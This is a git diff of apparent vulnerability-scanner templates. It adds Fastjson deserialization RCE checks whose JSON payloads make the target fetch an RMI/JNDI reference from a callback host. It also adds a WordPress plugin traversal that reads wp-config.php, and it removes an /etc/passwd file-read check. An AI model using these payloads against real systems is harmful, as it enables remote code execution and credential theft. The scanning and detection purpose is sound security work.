- "File to import" + - "Location of the text file" + + - type: status + status: + - 200 diff --git a/technologies/aviatrix-detect.yaml b/technologies/aviatrix-detect.yaml index a9640dd968..343b261d8b 100644 --- a/technologies/aviatrix-detect.yaml +++ b/technologies/aviatrix-detect.yaml @@ -2,7 +2,7 @@ id: aviatrix-detect info: name: Aviatrix Detect - author: pikpikcu + author: pikpikcu,philippedelteil severity: info tags: tech,aviatrix @@ -10,15 +10,20 @@ requests: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/assets/img/favicon-32x32.png" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: + - type: dsl + name: "title" + condition: and + dsl: + - 'contains(body, "Aviatrix")' + - 'contains(body, "Controller")' + - 'status_code == 200' - - type: word - part: body - words: - - "Aviatrix Controller" - - - type: status - status: - - 200 + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" diff --git a/technologies/confluence-detect.yaml b/technologies/confluence-detect.yaml index 168a3b1f53..ba239b67f4 100644 --- a/technologies/confluence-detect.yaml +++ b/technologies/confluence-detect.yaml @@ -5,7 +5,9 @@ info: author: philippedelteil severity: info description: Allows you to detect Atlassian Confluence instances - tags: tech,confluence + tags: tech,confluence,atlassian + metadata: + shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22 requests: - method: GET diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml index a8bb4d5847..0c1f84d566 100644 --- a/token-spray/iterable.yaml +++ b/token-spray/iterable.yaml @@ -20,3 +20,4 @@ requests: negative: true words: - 'BadApiKey' + - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve diff --git a/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml new file mode 100644 index 0000000000..864e73e8dd --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml @@ -0,0 +1,51 @@ +id: fastjson-1.2.24-rce + +info: + name: Fastjson 1.2.24 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce + - https://www.freebuf.com/vuls/208339.html + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization,oob + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "b":{ + "@type":"com.sun.rowset.JdbcRowSetImpl", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + } + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"com.sun.rowset.JdbcRowSetImpl", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: word + condition: and + words: + - "Internal Server Error" + - "500" \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml new file mode 100644 index 0000000000..d0e75c825e --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml @@ -0,0 +1,35 @@ +id: fastjson-1.2.41-rce + +info: + name: Fastjson 1.2.41 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization,oob + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"Lcom.sun.rowset.JdbcRowSetImpl", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: status + negative: true + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml new file mode 100644 index 0000000000..9fb159c5ff --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml @@ -0,0 +1,35 @@ +id: fastjson-1.2.42-rce + +info: + name: Fastjson 1.2.42 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization,oob + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: status + negative: true + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml new file mode 100644 index 0000000000..ea9499ce58 --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml @@ -0,0 +1,35 @@ +id: fastjson-1.2.43-rce + +info: + name: Fastjson 1.2.43 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization,oob + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"com.sun.rowset.JdbcRowSetImpl", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: status + negative: true + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml new file mode 100644 index 0000000000..e8428e5e15 --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml @@ -0,0 +1,44 @@ +id: fastjson-1.2.47-rce + +info: + name: Fastjson 1.2.47 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce + - https://www.freebuf.com/vuls/208339.html + - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization,oob + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "a":{ + "@type":"java.lang.Class", + "val":"com.sun.rowset.JdbcRowSetImpl" + }, + "b":{ + "@type":"com.sun.rowset.JdbcRowSetImpl", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: word + condition: and + words: + - "Bad Request" + - "400" \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml new file mode 100644 index 0000000000..8afbf260fd --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml @@ -0,0 +1,34 @@ +id: fastjson-1.2.62-rce + +info: + name: Fastjson 1.2.62 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization,oob + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"org.apache.xbean.propertyeditor.JndiConverter", + "AsText":"rmi://{{interactsh-url}}/exploit" + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: status + negative: true + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml new file mode 100644 index 0000000000..28f6c5d5cd --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml @@ -0,0 +1,37 @@ +id: fastjson-1.2.67-rce + +info: + name: Fastjson 1.2.67 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization,oob + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig", + "properties":{ + "@type":"java.util.Properties", + "UserTransaction":"rmi://{{interactsh-url}}/Exploit" + } + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: status + negative: true + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml new file mode 100644 index 0000000000..49ef2c1de0 --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml @@ -0,0 +1,55 @@ +id: fastjson-1.2.68-rce + +info: + name: Fastjson 1.2.68 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization,oob + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"org.apache.shiro.jndi.JndiObjectFactory", + "resourceName":"rmi://{{interactsh-url}}/Exploit" + } + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup", + "jndiNames":"rmi://{{interactsh-url}}/Exploit" + } + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"br.com.anteros.dbcp.AnterosDBCPConfig", + "metricRegistry":"rmi:/{{interactsh-url}}/Exploit" + } + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: status + negative: true + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index 4b8022a318..b56424baca 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -4,12 +4,12 @@ info: name: Bitrix Open URL redirect detection author: pikpikcu severity: low + description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html tags: redirect,bitrix requests: - method: GET - path: - '{{BaseURL}}/bitrix/rk.php?goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com' @@ -33,7 +33,7 @@ requests: part: header - type: status + condition: or status: - 302 - - 301 - condition: or + - 301 \ No newline at end of file diff --git a/vulnerabilities/other/commax-biometric-auth-bypass.yaml b/vulnerabilities/other/commax-biometric-auth-bypass.yaml index dfdc0ae4a8..dd820dfb22 100644 --- a/vulnerabilities/other/commax-biometric-auth-bypass.yaml +++ b/vulnerabilities/other/commax-biometric-auth-bypass.yaml @@ -4,7 +4,7 @@ info: name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass author: gy741 severity: critical - description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. + description: The COMMAX Biometric Access Control System suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. reference: - https://www.exploit-db.com/exploits/50206 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php diff --git a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml index c03a8be40a..16884d7384 100644 --- a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml +++ b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml @@ -4,6 +4,7 @@ info: name: DedeCmsV5.6 Carbuyaction Fileinclude author: pikpikcu severity: high + description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter. reference: https://www.cnblogs.com/milantgh/p/3615986.html tags: dedecms diff --git a/vulnerabilities/other/dedecms-membergroup-sqli.yaml b/vulnerabilities/other/dedecms-membergroup-sqli.yaml index 4100d95baa..1adc04596d 100644 --- a/vulnerabilities/other/dedecms-membergroup-sqli.yaml +++ b/vulnerabilities/other/dedecms-membergroup-sqli.yaml @@ -4,6 +4,7 @@ info: name: DedeCMS Membergroup SQLI author: pikpikcu severity: medium + description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter. reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html tags: sqli,dedecms diff --git a/vulnerabilities/other/ecoa-building-automation-lfd.yaml b/vulnerabilities/other/ecoa-building-automation-lfd.yaml deleted file mode 100644 index 24d0554968..0000000000 --- a/vulnerabilities/other/ecoa-building-automation-lfd.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: ecoa-building-automation-lfd -info: - name: ECOA Building Automation System - LFD - author: 0x_Akoko - severity: high - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php - tags: ecoa,lfi - -requests: - - raw: - - | - POST /viewlog.jsp HTTP/1.1 - Host: {{Hostname}} - - yr=2021&mh=6&fname=../../../../../../../../etc/passwd - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - condition: and - - - type: status - status: - - 200 diff --git a/vulnerabilities/other/fatpipe-backdoor.yaml b/vulnerabilities/other/fatpipe-backdoor.yaml index dd1ccac475..98e6e53d22 100644 --- a/vulnerabilities/other/fatpipe-backdoor.yaml +++ b/vulnerabilities/other/fatpipe-backdoor.yaml @@ -4,7 +4,7 @@ info: name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account author: gy741 severity: high - description: The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. + description: FatPipe Networks has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php - https://www.fatpipeinc.com/support/advisories.php diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml index 8e4768db23..c0e7dbfcad 100644 --- a/vulnerabilities/other/geovision-geowebserver-lfi.yaml +++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -4,7 +4,8 @@ info: name: GeoVision Geowebserver 5.3.3 - LFI author: madrobot severity: high - reference: https://www.exploit-db.com/exploits/50211 + description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. + reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,lfi requests: diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml index f9c3d234be..a047ed5e8b 100644 --- a/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -4,7 +4,8 @@ info: name: GeoVision Geowebserver 5.3.3 - XSS author: madrobot severity: medium - reference: https://www.exploit-db.com/exploits/50211 + description: GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. + reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,xss requests: diff --git a/vulnerabilities/other/h3c-imc-rce.yaml b/vulnerabilities/other/h3c-imc-rce.yaml index 470a86869d..2c0133a076 100644 --- a/vulnerabilities/other/h3c-imc-rce.yaml +++ b/vulnerabilities/other/h3c-imc-rce.yaml @@ -1,9 +1,10 @@ id: h3c-imc-rce info: - name: H3c IMC Rce + name: H3c IMC RCE author: pikpikcu severity: critical + description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw tags: rce,h3c-imc diff --git a/vulnerabilities/other/hasura-graphql-psql-exec.yaml b/vulnerabilities/other/hasura-graphql-psql-exec.yaml index 98bcfbc283..00d5756dd4 100644 --- a/vulnerabilities/other/hasura-graphql-psql-exec.yaml +++ b/vulnerabilities/other/hasura-graphql-psql-exec.yaml @@ -4,6 +4,7 @@ info: author: Udyz name: Hasura GraphQL Engine - postgresql query exec severity: critical + description: A vulnerability in Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint. reference: https://www.exploit-db.com/exploits/49802 tags: hasura,rce diff --git a/vulnerabilities/other/hiboss-rce.yaml b/vulnerabilities/other/hiboss-rce.yaml index 6765dc8577..10df9f9c37 100644 --- a/vulnerabilities/other/hiboss-rce.yaml +++ b/vulnerabilities/other/hiboss-rce.yaml @@ -4,6 +4,7 @@ info: name: Hiboss RCE author: pikpikcu severity: critical + description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter. reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994 tags: hiboss,rce diff --git a/vulnerabilities/other/karel-ip-phone-lfi.yaml b/vulnerabilities/other/karel-ip-phone-lfi.yaml index 8d8787781f..d2ca25b0c4 100644 --- a/vulnerabilities/other/karel-ip-phone-lfi.yaml +++ b/vulnerabilities/other/karel-ip-phone-lfi.yaml @@ -4,6 +4,7 @@ info: name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal author: 0x_Akoko severity: high + description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. reference: - https://cxsecurity.com/issue/WLB-2020100038 - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon diff --git a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml index de51dfbd25..27dc936559 100644 --- a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml +++ b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: WordPress Attitude Themes 1.1.1 Open Redirection author: 0x_Akoko severity: low + description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it. reference: https://cxsecurity.com/issue/WLB-2020030185 tags: wordpress,wp-theme,redirect diff --git a/vulnerabilities/wordpress/brandfolder-lfi.yaml b/vulnerabilities/wordpress/brandfolder-lfi.yaml index 54d3abbe1b..2cb1f03bf0 100644 --- a/vulnerabilities/wordpress/brandfolder-lfi.yaml +++ b/vulnerabilities/wordpress/brandfolder-lfi.yaml @@ -4,6 +4,7 @@ info: name: Wordpress brandfolder plugin - RFI & LFI author: 0x_Akoko severity: high + description: A vulnerability in WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content. reference: - https://www.exploit-db.com/exploits/39591 - https://cxsecurity.com/issue/WLB-2016030120 diff --git a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml index 5811edcd94..ddc524d0fc 100644 --- a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml +++ b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml @@ -1,9 +1,10 @@ id: brandfolder-open-redirect info: - name: Wordpress brandfolder plugin Open Redirect + name: WordPress Brandfolder Plugin Open Redirect author: 0x_Akoko severity: low + description: A vulnerability in WordPress Brandfolder allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it. reference: https://www.exploit-db.com/exploits/39591 tags: wordpress,wp-plugin,lfi,rfi diff --git a/vulnerabilities/wordpress/cherry-file-download.yaml b/vulnerabilities/wordpress/cherry-file-download.yaml new file mode 100644 index 0000000000..3597e4d780 --- /dev/null +++ b/vulnerabilities/wordpress/cherry-file-download.yaml @@ -0,0 +1,29 @@ +id: cherry-file-download + +info: + name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download + author: 0x_Akoko + severity: high + description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. + reference: + - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee + - https://github.com/CherryFramework/cherry-plugin + tags: wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/issuu-panel-lfi.yaml b/vulnerabilities/wordpress/issuu-panel-lfi.yaml index 079a043e95..d2ecd930f2 100644 --- a/vulnerabilities/wordpress/issuu-panel-lfi.yaml +++ b/vulnerabilities/wordpress/issuu-panel-lfi.yaml @@ -4,6 +4,7 @@ info: name: Wordpress Plugin Issuu Panel - RFI & LFI author: 0x_Akoko severity: high + description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files. reference: https://cxsecurity.com/issue/WLB-2016030131 tags: wp-plugin,wordpress,lfi,rfi